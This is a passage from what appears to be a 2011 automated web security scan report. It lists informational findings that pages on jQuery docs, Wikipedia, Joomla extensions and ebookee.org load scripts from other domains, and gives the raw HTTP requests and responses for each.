       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.178. http://docs.jquery.com/UI/Effects/Fold previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Fold

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Fold HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:06 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.179. http://docs.jquery.com/UI/Effects/Highlight previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Highlight

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Highlight HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:07 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Sun, 29 Aug 2010 18:46:15 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.180. http://docs.jquery.com/UI/Effects/Pulsate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Pulsate

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Pulsate HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:08 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.181. http://docs.jquery.com/UI/Effects/Scale previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Scale

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Scale HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:08 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.182. http://docs.jquery.com/UI/Effects/Shake previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Shake

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Shake HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:08 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Fri, 19 Nov 2010 17:52:24 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.183. http://docs.jquery.com/UI/Effects/Slide previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Slide

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Slide HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:11 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.184. http://docs.jquery.com/UI/Effects/Transfer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Transfer

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Transfer HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:12 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.185. http://docs.jquery.com/UI/Resizables previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Resizables

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Resizables HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:33:01 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.186. http://docs.jquery.com/UI/Selectables previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Selectables

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Selectables HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:28 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.187. http://docs.jquery.com/UI/Sortables previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Sortables

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Sortables HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:16 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.188. http://ebookee.org/TrainSignal-Cisco-CCNA-Training-Videos_929461.html/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ebookee.org
Path:	/TrainSignal-Cisco-CCNA-Training-Videos_929461.html/x22

Issue detail

The response dynamically includes the following script from another domain:

http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js

Request

GET /TrainSignal-Cisco-CCNA-Training-Videos_929461.html/x22 HTTP/1.1
Host: ebookee.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 24 Jan 2011 14:10:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1284
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head><title>HTTP 404 Not Found</ti
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js"></script>
...[SNIP]...

21.189. http://en.wikipedia.org/wiki/Amazon.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://en.wikipedia.org
Path:	/wiki/Amazon.com/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19
http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19
http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19
http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19
http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19
http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19
http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2
http://geoiplookup.wikimedia.org/

Request

GET /wiki/Amazon.com/x22 HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 15:04:29 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Content-Length: 20593
Content-Type: text/html; charset=UTF-8
Age: 425
X-Cache: HIT from sq66.wikimedia.org
X-Cache-Lookup: HIT from sq66.wikimedia.org:3128
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19" type="text/javascript"></script>
<script type="text/javascript" src="http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

21.190. http://en.wikipedia.org/wiki/American_University_of_Beirut/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://en.wikipedia.org
Path:	/wiki/American_University_of_Beirut/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19
http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19
http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19
http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19
http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19
http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19
http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2
http://geoiplookup.wikimedia.org/

Request

GET /wiki/American_University_of_Beirut/x22 HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 15:04:31 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Content-Length: 21315
Content-Type: text/html; charset=UTF-8
Age: 425
X-Cache: HIT from sq60.wikimedia.org
X-Cache-Lookup: HIT from sq60.wikimedia.org:3128
X-Cache: MISS from sq59.wikimedia.org
X-Cache-Lookup: MISS from sq59.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19" type="text/javascript"></script>
<script type="text/javascript" src="http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

21.191. http://en.wikipedia.org/wiki/Auto_Trader/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://en.wikipedia.org
Path:	/wiki/Auto_Trader/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19
http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19
http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19
http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19
http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19
http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19
http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2
http://geoiplookup.wikimedia.org/

Request

GET /wiki/Auto_Trader/x22 HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 15:04:30 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Content-Length: 20631
Content-Type: text/html; charset=UTF-8
Age: 425
X-Cache: HIT from sq60.wikimedia.org
X-Cache-Lookup: HIT from sq60.wikimedia.org:3128
X-Cache: MISS from sq72.wikimedia.org
X-Cache-Lookup: MISS from sq72.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19" type="text/javascript"></script>
<script type="text/javascript" src="http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

21.192. http://en.wikipedia.org/wiki/Strike_Team previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://en.wikipedia.org
Path:	/wiki/Strike_Team

Issue detail

The response dynamically includes the following scripts from other domains:

http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19
http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19
http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19
http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19
http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19
http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19
http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2
http://geoiplookup.wikimedia.org/

Request

GET /wiki/Strike_Team HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 12 Jan 2011 21:24:15 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Last-Modified: Sun, 31 Oct 2010 06:31:11 GMT
Content-Length: 20996
Content-Type: text/html; charset=UTF-8
Age: 1041077
X-Cache: HIT from sq71.wikimedia.org
X-Cache-Lookup: HIT from sq71.wikimedia.org:3128
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: MISS from sq76.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19" type="text/javascript"></script>
<script type="text/javascript" src="http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

21.193. http://extensions.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET / HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=9b5564d7b57848ef22bf9ac141472038; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.194. http://extensions.joomla.org/extensions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /extensions HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=8ce91e96c30d6b3c03ce44895359f0bf; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.195. http://extensions.joomla.org/extensions/advanced-search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions/advanced-search

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /extensions/advanced-search HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=662ff80b6519b113832192982b098a5a; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

